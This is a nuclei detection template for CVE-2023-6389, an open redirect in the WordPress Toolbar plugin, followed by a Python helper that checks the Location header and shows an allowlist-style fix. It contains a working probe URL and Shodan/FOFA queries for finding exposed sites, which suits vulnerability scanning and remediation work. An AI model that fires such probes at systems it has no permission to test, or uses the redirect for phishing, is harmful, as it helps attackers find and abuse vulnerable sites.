Vulnerability description
The plugin's toolbar.php script redirects to whatever URL is supplied in the "wptbto" parameter without validating it (CWE-601, open redirect). An unauthenticated attacker can therefore send a victim a link on the trusted WordPress site that forwards them to an arbitrary, potentially malicious site, provided the victim can be tricked into following the link.
id: CVE-2023-6389

info:
  name: WordPress Toolbar <= 2.2.6 - Open Redirect
  author: s4e-io
  severity: medium
  description: |
    The plugin redirects to any URL via the "wptbto" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
  impact: |
    Unauthenticated attackers can redirect users to malicious external sites via the wptbto parameter, potentially facilitating phishing attacks or credential theft.
  remediation: |
    Update WordPress Toolbar plugin to version 2.2.7 or later.
  reference:
    - https://wpscan.com/vulnerability/04dafc55-3a8d-4dd2-96da-7a8b100e5a81/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6389
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6389
    cwe-id: CWE-601
    epss-score: 0.52517
    epss-percentile: 0.97848
    cpe: cpe:2.3:a:abhinavsingh:wordpress_toolbar:*:*:*:*:*:*:wordpress:*
  metadata:
    verified: true
    max-request: 1
    vendor: abhinavsingh
    product: wordpress_toolbar
    shodan-query: http.html:/wp-content/plugins/wordpress-toolbar/
    fofa-query: body=/wp-content/plugins/wordpress-toolbar/
    publicwww-query: "/wp-content/plugins/wordpress-toolbar/"
  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect,abhinavsingh,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a004730450220126890991b51857059b402591ba8184560bfa1f63ef0d586f3be2122e08fc5b90221009a7581d200603aa4645c1404cf706caf3777a779a381d6a1d9fbdaf47485306d:922c64590222798bb761d5b6d8e72950
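The template above decides "vulnerable" by running one regular expression over the response header block. The following Python is an added example, not part of the nuclei template or of the plugin: it builds the same probe URL, applies the template's exact regex to a response, and then does the stricter check a practitioner wants before filing a finding, parsing the Location header and confirming the redirect host really is the canary (oast.me, the domain nuclei's interactsh uses) rather than a look-alike or a relative path. It also includes a generic allowlist validator illustrating how CWE-601 is normally fixed; that is not the plugin's actual 2.2.7 patch. The sample HTTP responses are constructed inline, the `wptbhash=acme` value is carried over from the template as a filler, and `live_probe` is an assumed helper that only runs when the script is executed against a real host.

```python
import http.client
from typing import Optional
import re
from urllib.parse import urlencode, urlsplit

# The template's Location matcher, verbatim (canary host: oast.me).
LOCATION_RE = re.compile(
    r'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
)

PROBE_PATH = "/wp-content/plugins/wordpress-toolbar/toolbar.php"


def build_probe_url(base_url: str, canary: str = "https://oast.me") -> str:
    """Same GET the template sends; wptbhash=acme is the template's filler value."""
    query = urlencode({"wptbto": canary, "wptbhash": "acme"})
    return f"{base_url.rstrip('/')}{PROBE_PATH}?{query}"


def header_block(raw_response: bytes) -> str:
    """Status line plus headers of a raw HTTP response (body dropped), as the template's part: header."""
    head, _, _ = raw_response.partition(b"\r\n\r\n")
    return head.decode("latin-1")


def template_matches(raw_response: bytes) -> bool:
    """Exactly what the nuclei matcher does: regex search over the header block."""
    return LOCATION_RE.search(header_block(raw_response)) is not None


def redirect_host(raw_response: bytes) -> Optional[str]:
    """Parse the Location header; return the host it points at, or None for a relative target / no redirect."""
    for line in header_block(raw_response).split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "location":
            # urlsplit handles absolute and scheme-relative ('//host/...') URLs alike.
            return urlsplit(value.strip()).hostname
    return None


def is_open_redirect(raw_response: bytes, canary_host: str = "oast.me") -> bool:
    """Stricter confirmation: the parsed redirect host is the canary or a subdomain of it."""
    host = redirect_host(raw_response)
    return host is not None and (host == canary_host or host.endswith("." + canary_host))


def safe_redirect_target(candidate: str, site_host: str) -> str:
    """Generic CWE-601 remediation pattern (illustrative, not the plugin's fix):
    accept only a local path or an absolute URL on our own host, else fall back to '/'."""
    if any(c in candidate for c in "\\\r\n"):      # browsers treat '\' like '/', so '/\host' is external
        return "/"
    parts = urlsplit(candidate)
    if parts.scheme == "" and parts.netloc == "" and candidate.startswith("/") and not candidate.startswith("//"):
        return candidate                          # site-relative path, e.g. '/wp-admin/'
    if parts.scheme in ("http", "https") and parts.hostname == site_host:
        return candidate                          # absolute URL back to ourselves
    return "/"


# Constructed sample responses (not captured from a real site).
VULNERABLE_RESPONSE = b"HTTP/1.1 302 Found\r\nLocation: https://oast.me/\r\nContent-Length: 0\r\n\r\n"
PATCHED_RESPONSE = b"HTTP/1.1 302 Found\r\nLocation: /\r\n\r\n"
LOOKALIKE_RESPONSE = b"HTTP/1.1 302 Found\r\nLocation: https://oast.me.example.test/\r\n\r\n"
BARE_RESPONSE = b"HTTP/1.1 302 Found\r\nLocation: oast.me/\r\n\r\n"   # relative path to a browser


def live_probe(base_url: str) -> bytes:
    """Assumed helper: fetch the probe without following redirects and rebuild the raw header block."""
    parts = urlsplit(build_probe_url(base_url))
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.netloc, timeout=10)
    conn.request("GET", f"{parts.path}?{parts.query}")
    resp = conn.getresponse()
    raw = f"HTTP/1.1 {resp.status} {resp.reason}\r\n"
    raw += "".join(f"{k}: {v}\r\n" for k, v in resp.getheaders()) + "\r\n"
    return raw.encode("latin-1")


if __name__ == "__main__":
    import sys
    raw = live_probe(sys.argv[1]) if len(sys.argv) > 1 else VULNERABLE_RESPONSE
    print("template regex matched:", template_matches(raw))
    print("redirect host:", redirect_host(raw))
    print("confirmed open redirect to canary:", is_open_redirect(raw))
```

The LOOKALIKE and BARE samples show where the regex and the parsed check disagree: `Location: https://oast.me.example.test/` and `Location: oast.me/` both satisfy the template's pattern, but neither sends a browser to oast.me (the first is a different host, the second is a relative path). With a canary domain nobody else controls this is harmless in practice, but if you adapt the matcher to a real target host, check the parsed hostname rather than a substring.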